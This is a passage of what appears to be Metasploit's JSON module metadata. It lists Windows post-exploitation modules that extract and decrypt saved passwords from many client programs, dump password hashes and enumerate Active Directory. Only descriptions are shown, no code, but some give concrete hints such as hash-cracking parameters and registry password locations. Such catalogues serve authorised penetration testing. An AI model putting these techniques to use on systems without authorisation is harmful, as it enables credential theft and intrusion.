"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect iMail user data such as the username, domain,\n full name, e-mail, and the decoded password. Please note if IMAILUSER is\n specified, the module extracts user data from all the domains found. If\n IMAILDOMAIN is specified, then it will extract all user data under that\n particular category.",
"references": [
"EDB-11331"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/imail.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/imail",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/imvu": {
"name": "Windows Gather Credentials IMVU Game Client",
"full_name": "post/windows/gather/credentials/imvu",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Shubham Dawra <shubham2dawra@gmail.com>"
],
"description": "This module extracts the account username & password from the IMVU game client\n and stores them as loot.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/imvu.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/imvu",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/mcafee_vse_hashdump": {
"name": "McAfee Virus Scan Enterprise Password Hashes Dump",
"full_name": "post/windows/gather/credentials/mcafee_vse_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Mike Manzotti <mike.manzotti@dionach.com>",
"Maurizio inode Agazzini"
],
"description": "This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)\n used to lock down the user interface. Hashcat supports cracking this type of\n hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt\n (--hex-salt) of 01000f000d003300 (unicode \"\\x01\\x0f\\x0d\\x33\"). A dynamic\n format is available for John the Ripper at the referenced URL.",
"references": [
"URL-https://www.dionach.com/blog/disabling-mcafee-on-access-scanning"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mcafee_vse_hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/mdaemon_cred_collector": {
"name": "Windows Gather MDaemonEmailServer Credential Cracking",
"full_name": "post/windows/gather/credentials/mdaemon_cred_collector",
"rank": 600,
"disclosure_date": null,
"type": "post",
"author": [
"Manuel Nader #AgoraSecurity"
],
"description": "Finds and cracks the stored passwords of MDaemon Email Server",
"references": [
"BID-4686"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-20 18:24:41 +0000",
"path": "/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mdaemon_cred_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/meebo": {
"name": "Windows Gather Meebo Password Extractor",
"full_name": "post/windows/gather/credentials/meebo",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sil3ntDre4m <sil3ntdre4m@gmail.com>",
"Unknown"
],
"description": "This module extracts the login account password stored by\n Meebo Notifier, a desktop version of Meebo's Online Messenger.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/meebo.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/meebo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/mremote": {
"name": "Windows Gather mRemote Saved Password Extraction",
"full_name": "post/windows/gather/credentials/mremote",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>",
"mubix <mubix@hak5.org>"
],
"description": "This module extracts saved passwords from mRemote. mRemote stores\n connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves\n the passwords in an encrypted format. The module will extract the connection\n info and decrypt the saved passwords.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-10 15:14:38 +0000",
"path": "/modules/post/windows/gather/credentials/mremote.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mremote",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/mssql_local_hashdump": {
"name": "Windows Gather Local SQL Server Hash Dump",
"full_name": "post/windows/gather/credentials/mssql_local_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Mike Manzotti <mike.manzotti@dionach.com>",
"nullbind"
],
"description": "This module extracts the usernames and password\n hashes from an MSSQL server and stores them as loot. It uses the\n same technique as mssql_local_auth_bypass.",
"references": [
"URL-https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/mssql_local_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mssql_local_hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/nimbuzz": {
"name": "Windows Gather Nimbuzz Instant Messenger Password Extractor",
"full_name": "post/windows/gather/credentials/nimbuzz",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sil3ntdre4m <sil3ntdre4m@gmail.com>",
"Unknown"
],
"description": "This module extracts the account passwords saved by Nimbuzz Instant\n Messenger in hex format.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/nimbuzz.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/nimbuzz",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/outlook": {
"name": "Windows Gather Microsoft Outlook Saved Password Extraction",
"full_name": "post/windows/gather/credentials/outlook",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Justin Cacak"
],
"description": "This module extracts and decrypts saved Microsoft\n Outlook (versions 2002-2010) passwords from the Windows\n Registry for POP3/IMAP/SMTP/HTTP accounts.\n In order for decryption to be successful, this module must be\n executed under the same privileges as the user which originally\n encrypted the password.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-03-24 19:11:22 +0000",
"path": "/modules/post/windows/gather/credentials/outlook.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/outlook",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/purevpn_cred_collector": {
"name": "Windows Gather PureVPN Client Credential Collector",
"full_name": "post/windows/gather/credentials/purevpn_cred_collector",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Manuel Nader #AgoraSecurity"
],
"description": "Finds the password stored for the PureVPN Client.",
"references": [
"URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/Credential-Leak-Flaws-in-Windows-PureVPN-Client/",
"URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-010/?fid=11779"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-27 16:23:09 +0000",
"path": "/modules/post/windows/gather/credentials/purevpn_cred_collector.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/purevpn_cred_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/razer_synapse": {
"name": "Windows Gather Razer Synapse Password Extraction",
"full_name": "post/windows/gather/credentials/razer_synapse",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>",
"Matt Howard \"pasv\" <themdhoward@gmail.com>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>"
],
"description": "This module will enumerate passwords stored by the Razer Synapse\n client. The encryption key and IV are publicly known. This module\n will not only extract the encrypted password but will also decrypt\n it using the publicly known key. Affects versions earlier than 1.7.15.",
"references": [
"URL-http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/",
"URL-https://github.com/pasv/Testing/blob/master/Razer_decode.py"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/razer_synapse.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/razer_synapse",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/razorsql": {
"name": "Windows Gather RazorSQL Credentials",
"full_name": "post/windows/gather/credentials/razorsql",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Paul Rascagneres <rascagneres@itrust.lu>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module stores username, password, type, host, port, database (and name)\n collected from profiles.txt of RazorSQL.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/razorsql.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/razorsql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/rdc_manager_creds": {
"name": "Windows Gather Remote Desktop Connection Manager Saved Password Extraction",
"full_name": "post/windows/gather/credentials/rdc_manager_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Tom Sellers <tom@fadedcode.net>"
],
"description": "This module extracts and decrypts saved Microsoft Remote Desktop\n Connection Manager (RDCMan) passwords from the .RDG files of users.\n The module will attempt to find the files configured for all users\n on the target system. Passwords for managed hosts are encrypted by\n default. In order for decryption of these passwords to be successful,\n this module must be executed under the same account as the user which\n originally encrypted the password. Passwords stored in plain text will\n be captured and documented.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/rdc_manager_creds.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/rdc_manager_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/skype": {
"name": "Windows Gather Skype Saved Password Hash Extraction",
"full_name": "post/windows/gather/credentials/skype",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>",
"hdm <x@hdm.io>"
],
"description": "This module finds saved login credentials\n for the Windows Skype client. The hash is in MD5 format\n that uses the username, a static string \"\\nskyper\\n\" and the\n password. The resulting MD5 is stored in the Config.xml file\n for the user after being XOR'd against a key generated by applying\n 2 SHA1 hashes of \"salt\" data which is stored in ProtectedStorage\n using the Windows API CryptProtectData against the MD5",
"references": [
"URL-http://www.recon.cx/en/f/vskype-part2.pdf",
"URL-http://insecurety.net/?p=427",
"URL-https://github.com/skypeopensource/tools"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/skype.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/skype",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/smartermail": {
"name": "Windows Gather SmarterMail Password Extraction",
"full_name": "post/windows/gather/credentials/smartermail",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joe Giron",
"bcoles <bcoles@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module extracts and decrypts the sysadmin password in the\n SmarterMail 'mailConfig.xml' configuration file. The encryption\n key and IV are publicly known.\n\n This module has been tested successfully on SmarterMail versions\n 10.7.4842 and 11.7.5136.",
"references": [
"URL-http://www.gironsec.com/blog/tag/cracking-smartermail/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/post/windows/gather/credentials/smartermail.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/smartermail",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/smartftp": {
"name": "Windows Gather SmartFTP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/smartftp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module finds saved login credentials\n for the SmartFTP FTP client for Windows.\n It finds the saved passwords and decrypts\n them.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 15:57:09 +0000",
"path": "/modules/post/windows/gather/credentials/smartftp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/smartftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/spark_im": {
"name": "Windows Gather Spark IM Password Extraction",
"full_name": "post/windows/gather/credentials/spark_im",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>",
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>"
],
"description": "This module will enumerate passwords stored by the Spark IM client.\n The encryption key is publicly known. This module will not only extract the encrypted\n password but will also decrypt it using the publicly known key.",
"references": [
"URL-http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/spark_im.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/spark_im",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/sso": {
"name": "Windows Single Sign On Credential Collector (Mimikatz)",
"full_name": "post/windows/gather/credentials/sso",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will collect cleartext Single Sign On credentials from the Local\n Security Authority using the Mimikatz extension. Blank passwords will not be stored\n in the database.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/sso.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/sso",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/steam": {
"name": "Windows Gather Steam Client Session Collector.",
"full_name": "post/windows/gather/credentials/steam",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Nikolai Rusakov <nikolai.rusakov@gmail.com>"
],
"description": "This module will collect Steam session information from an\n account set to autologin.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/steam.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/steam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/tortoisesvn": {
"name": "Windows Gather TortoiseSVN Saved Password Extraction",
"full_name": "post/windows/gather/credentials/tortoisesvn",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Justin Cacak"
],
"description": "This module extracts and decrypts saved TortoiseSVN passwords. In\n order for decryption to be successful this module must be executed\n under the same privileges as the user which originally encrypted the\n password.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/tortoisesvn.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/tortoisesvn",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/total_commander": {
"name": "Windows Gather Total Commander Saved Password Extraction",
"full_name": "post/windows/gather/credentials/total_commander",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts weakly encrypted saved FTP Passwords from Total Commander.\n It finds saved FTP connections in the wcx_ftp.ini file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/total_commander.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/total_commander",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/trillian": {
"name": "Windows Gather Trillian Password Extractor",
"full_name": "post/windows/gather/credentials/trillian",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sil3ntDre4m <sil3ntdre4m@gmail.com>",
"Unknown"
],
"description": "This module extracts the account password from Trillian & Trillian Astra\n v4.x-5.x instant messenger.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/trillian.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/trillian",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/vnc": {
"name": "Windows Gather VNC Password Extraction",
"full_name": "post/windows/gather/credentials/vnc",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kurt Grutzmacher <grutz@jingojango.net>",
"mubix <mubix@hak5.org>"
],
"description": "This module extracts DES-encrypted passwords from known VNC locations.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/vnc.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/vnc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/windows_autologin": {
"name": "Windows Gather AutoLogin User Credential Extractor",
"full_name": "post/windows/gather/credentials/windows_autologin",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Myo Soe"
],
"description": "This module extracts the plain-text Windows user login password from the Registry.\n It exploits a Windows feature (2000 to 2008 R2) that allows a\n user or third-party Windows utility tools to configure User AutoLogin by\n inserting a plain-text password in the (Alt)DefaultPassword field at the registry\n location HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable\n by all users.",
"references": [
"URL-http://support.microsoft.com/kb/315231",
"URL-http://core.yehg.net/lab/#tools.exploits"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/windows_autologin.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/windows_autologin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/winscp": {
"name": "Windows Gather WinSCP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/winscp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts weakly encrypted saved passwords from\n WinSCP. It searches for saved sessions in the Windows Registry\n and the WinSCP.ini file. It cannot decrypt passwords if a master\n password is used.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/winscp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/winscp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/wsftp_client": {
"name": "Windows Gather WS_FTP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/wsftp_client",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts weakly encrypted saved FTP Passwords\n from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/wsftp_client.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/wsftp_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/dnscache_dump": {
"name": "Windows Gather DNS Cache",
"full_name": "post/windows/gather/dnscache_dump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module displays the records stored in the DNS cache.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/dnscache_dump.rb",
"is_install_path": true,
"ref_name": "windows/gather/dnscache_dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/dumplinks": {
"name": "Windows Gather Dump Recent Files lnk Info",
"full_name": "post/windows/gather/dumplinks",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"davehull <dph_msf@trustedsignal.com>"
],
"description": "The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script.\n This module will parse .lnk files from a user's Recent Documents folder\n and Microsoft Office's Recent Documents folder, if present.\n Windows creates these link files automatically for many common file types.\n The .lnk files contain time stamps, file locations, including share\n names, volume serial numbers, and more.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/dumplinks.rb",
"is_install_path": true,
"ref_name": "windows/gather/dumplinks",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_bitlocker": {
"name": "Windows Gather Active Directory BitLocker Recovery",
"full_name": "post/windows/gather/enum_ad_bitlocker",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <ben.campbell@mwrinfosecurity.com>"
],
"description": "This module will enumerate BitLocker recovery passwords in the default AD\n directory. This module does require Domain Admin or other delegated privileges.",
"references": [
"URL-https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_bitlocker.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_bitlocker",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_computers": {
"name": "Windows Gather Active Directory Computers",
"full_name": "post/windows/gather/enum_ad_computers",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will enumerate computers in the default AD directory.\n\n Optional Attributes to use in ATTRIBS:\n objectClass, cn, description, distinguishedName, instanceType, whenCreated,\n whenChanged, uSNCreated, uSNChanged, name, objectGUID,\n userAccountControl, badPwdCount, codePage, countryCode,\n badPasswordTime, lastLogoff, lastLogon, localPolicyFlags,\n pwdLastSet, primaryGroupID, objectSid, accountExpires,\n logonCount, sAMAccountName, sAMAccountType, operatingSystem,\n operatingSystemVersion, operatingSystemServicePack, serverReferenceBL,\n dNSHostName, rIDSetPreferences, servicePrincipalName, objectCategory,\n netbootSCPBL, isCriticalSystemObject, frsComputerReferenceBL,\n lastLogonTimestamp, msDS-SupportedEncryptionTypes\n\n ActiveDirectory has a MAX_SEARCH limit of 1000 by default. Split search up\n if you hit that limit.\n\n Possible filters:\n (objectClass=computer) # All Computers\n (primaryGroupID=516) # All Domain Controllers\n (&(objectCategory=computer)(operatingSystem=*server*)) # All Servers",
"references": [
"URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_computers.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_computers",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_groups": {
"name": "Windows Gather Active Directory Groups",
"full_name": "post/windows/gather/enum_ad_groups",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will enumerate AD groups on the specified domain.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_groups.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_groups",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_managedby_groups": {
"name": "Windows Gather Active Directory Managed Groups",
"full_name": "post/windows/gather/enum_ad_managedby_groups",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will enumerate AD groups on the specified domain which are specifically managed.\n It cannot at the moment identify whether the 'Manager can update membership list' option is\n set; if so, it would allow that manager to update the contents of that group. This\n could either be used as a persistence mechanism (for example, set your user as the 'Domain\n Admins' group manager) or could be used to detect privilege escalation opportunities\n without having domain admin privileges.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_managedby_groups.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_managedby_groups",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_service_principal_names": {
"name": "Windows Gather Active Directory Service Principal Names",
"full_name": "post/windows/gather/enum_ad_service_principal_names",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Scott Sutherland"
],
"description": "This module will enumerate servicePrincipalName in the default AD directory\n where the user is a member of the Domain Admins group.",
"references": [
"URL-https://www.netspi.com/blog/entryid/214/faster-domain-escalation-using-ldap"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_service_principal_names.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_service_principal_names",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_to_wordlist": {
"name": "Windows Active Directory Wordlist Builder",
"full_name": "post/windows/gather/enum_ad_to_wordlist",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Thomas Ring"
],
"description": "This module will gather information from the default Active Directory (AD) domain\n and use these words to seed a wordlist. By default it enumerates user accounts to\n build the wordlist.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_to_wordlist.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_to_wordlist",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_user_comments": {
"name": "Windows Gather Active Directory User Comments",
"full_name": "post/windows/gather/enum_ad_user_comments",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will enumerate user accounts in the default Active Directory (AD) domain which\n contain 'pass' in their description or comment (case-insensitive) by default. In some cases,\n such users have their passwords specified in these fields.",
"references": [
"URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_user_comments.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_user_comments",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ad_users": {
"name": "Windows Gather Active Directory Users",
"full_name": "post/windows/gather/enum_ad_users",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
